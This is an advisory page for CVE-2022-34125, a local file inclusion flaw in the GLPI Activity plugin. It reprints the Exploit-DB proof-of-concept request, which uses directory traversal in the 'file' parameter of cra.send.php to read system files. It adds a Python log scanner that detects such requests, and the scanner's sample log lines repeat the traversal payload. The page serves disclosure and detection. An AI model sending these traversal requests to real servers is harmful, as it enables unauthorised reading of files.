Vendor: GLPI Activity
By: Nuri Çilengir
CVSS: 6.5 (MEDIUM)
Type: Authenticated Local File Inclusion
CWE: 22
Product Name: GLPI Activity
Affected Version From: GLPI Activity < 3.1.0
Affected Version To: GLPI Activity < 3.1.1
Patch Exists: YES
Related CVE: CVE-2022-34125
CPE: a:glpi_project:glpi_activity:3.1.0
Platforms Tested: Ubuntu 22.04
2022

GLPI Activity v3.1.0 – Authenticated Local File Inclusion on Activity plugin

The GLPI Activity plugin, version 3.1.0 and earlier, contains an authenticated local file inclusion vulnerability. An authenticated attacker can exploit it to read arbitrary files from the target system.

Mitigation:

Update to GLPI Activity version 3.1.1 or later.

Exploit-DB raw data:

# Exploit Title: GLPI Activity  v3.1.0 - Authenticated Local File Inclusion on Activity plugin
# Date of found: 11 Jun 2022
# Application: GLPI Activity < 3.1.0
# Author: Nuri Çilengir 
# Vendor Homepage: https://glpi-project.org/
# Software Link: https://github.com/InfotelGLPI/activity
# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/
# Tested on: Ubuntu 22.04
# CVE : CVE-2022-34125

# PoC
GET /marketplace/activity/front/cra.send.php?&file=../../\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts&seefile=1 HTTP/1.1
Host: 192.168.56.113
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
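
A defender-side check for the request shown in the PoC, as an added example that is not part of the original advisory or Exploit-DB entry: it scans web-server access-log lines for requests to cra.send.php whose file parameter contains directory traversal or an absolute path. The log lines, client addresses, timestamps and the benign file name are constructed for illustration, and the function names are this example's own.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint and parameter names come from the PoC request on this page.
VULN_PATH = re.compile(r"/activity/front/cra\.send\.php$", re.IGNORECASE)
REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded values are normalised too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(value):
    """True if the value climbs directories or names an absolute path."""
    norm = fully_decode(value).replace("\\", "/")
    parts = [p for p in norm.split("/") if p]
    absolute = norm.startswith("/") or re.match(r"[A-Za-z]:", norm) is not None
    return ".." in parts or absolute

def suspicious_requests(log_lines):
    """Return (line_number, decoded file value) for traversal attempts."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group("target"))
        if not VULN_PATH.search(url.path):
            continue
        for value in parse_qs(url.query).get("file", []):
            if is_traversal(value):
                hits.append((number, fully_decode(value)))
    return hits

# Constructed access-log lines; addresses, timestamps and sizes are made up.
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Jun/2022:10:00:01 +0000] "GET /marketplace/activity/front/cra.send.php?file=report_2022.pdf&seefile=1 HTTP/1.1" 200 5120',
    r'192.0.2.20 - - [11/Jun/2022:10:02:13 +0000] "GET /marketplace/activity/front/cra.send.php?&file=../../\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts&seefile=1 HTTP/1.1" 200 812',
    '192.0.2.20 - - [11/Jun/2022:10:02:40 +0000] "GET /plugins/activity/front/cra.send.php?file=..%2F..%2F..%5C..%5CWindows%5CSystem32%5Cdrivers%5Cetc%5Chosts&seefile=1 HTTP/1.1" 200 812',
    '192.0.2.30 - - [11/Jun/2022:10:05:00 +0000] "GET /index.php HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: traversal in file parameter: {value!r}")
```

The check is a detection aid for unpatched or historical logs; the fix remains the update to 3.1.1 or later named under Mitigation.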